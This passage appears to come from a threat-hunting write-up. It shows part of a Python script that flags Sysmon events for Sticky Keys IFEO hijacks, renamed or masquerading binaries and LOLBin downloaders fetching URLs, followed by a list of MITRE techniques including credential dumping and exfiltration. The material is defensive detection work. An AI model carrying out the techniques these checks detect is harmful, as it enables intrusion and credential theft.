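        binary = target.split("\\")[-2]  # the executable the IFEO key is for
        if binary in ACCESSIBILITY_BINS:
            return f"IFEO Debugger set for {binary} (Sticky Keys hijack)"
    return None


def check_process(ev: dict):
    """Sysmon EID 1 (process create): masquerading binaries and LOLBin downloads."""
    image = ev["Image"]
    name = ntpath.basename(image).lower()
    folder = ntpath.dirname(image).lower() + "\\"
    if name in MASQUERADE_NAMES and not folder.startswith(SYSTEM_DIRS):
        return f"{name} running from {folder}, not a system directory (renamed tool?)"
    original = ev.get("OriginalFileName", "").lower()
    if original and original != name:
        return f"{name} was renamed: PE original file name is {original}"
    if name in LOLBIN_DOWNLOADERS and re.search(r"https?://", ev.get("CommandLine", ""), re.I):
        return f"{name} fetching remote content (ingress tool transfer)"
    return None


def triage(events):
    """Run each event through the matching check; return (time, event id, reason) per hit."""
    hits = []
    for ev in events:
        if ev["EventID"] == 13:
            reason = check_registry(ev)
        elif ev["EventID"] == 1:
            reason = check_process(ev)
        else:
            reason = None
        if reason:
            hits.append((ev["UtcTime"], ev["EventID"], reason))
    return hits


if __name__ == "__main__":
    for when, eid, reason in triage(CONSTRUCTED_EVENTS):
        print(f"{when}  EID {eid:>2}  {reason}")
```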

MITRE Summary

T1003 (OS Credential Dumping)
T1003.001 (LSASS Memory)
T1005 (Data from Local System)
T1018 (Remote System Discovery)
T1041 (Exfiltration Over C2 Channel)
T1068 (Exploitation for Privilege Escalation)
T1105 (Ingress Tool Transfer)


IOCS

Resources & Related Articles